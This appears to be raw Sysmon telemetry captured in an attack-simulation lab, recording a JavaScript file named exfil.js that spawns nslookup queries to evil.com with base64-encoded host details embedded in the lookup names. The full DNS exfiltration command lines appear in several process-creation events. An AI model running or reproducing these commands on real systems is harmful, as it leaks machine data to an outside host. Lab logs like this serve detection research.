14:16:24.949{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlylbz.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-17B8-629A-A63F-000000005F02}4085012C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-A73F-000000005F02}2260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A73F-000000005F02}2260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.917{2E1864BB-17B8-629A-A53F-000000005F02}68242240C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-A73F-000000005F02}2260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.923{2E1864BB-17B8-629A-A73F-000000005F02}2260C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-A53F-000000005F02}6824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlylbz.tmp 2>&1 10341000x8000000000000000198454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.902{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A63F-000000005F02}408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.902{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A63F-000000005F02}408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.897{2E1864BB-17B8-629A-A63F-000000005F02}4085012C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-A53F-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A63F-000000005F02}408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A53F-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.880{2E1864BB-17A1-629A-783D-000000005F02}55525064C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-A53F-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.881{2E1864BB-17B8-629A-A53F-000000005F02}6824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlylbz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.864{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltkus.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-17B8-629A-A33F-000000005F02}59205576C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-A43F-000000005F02}2608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A43F-000000005F02}2608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.833{2E1864BB-17B8-629A-A23F-000000005F02}8100928C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-A43F-000000005F02}2608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.848{2E1864BB-17B8-629A-A43F-000000005F02}2608C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-A23F-000000005F02}8100C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltkus.tmp 2>&1 10341000x8000000000000000198434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.817{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A33F-000000005F02}5920C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.817{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A33F-000000005F02}5920C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.817{2E1864BB-17B8-629A-A33F-000000005F02}59205576C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-A23F-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 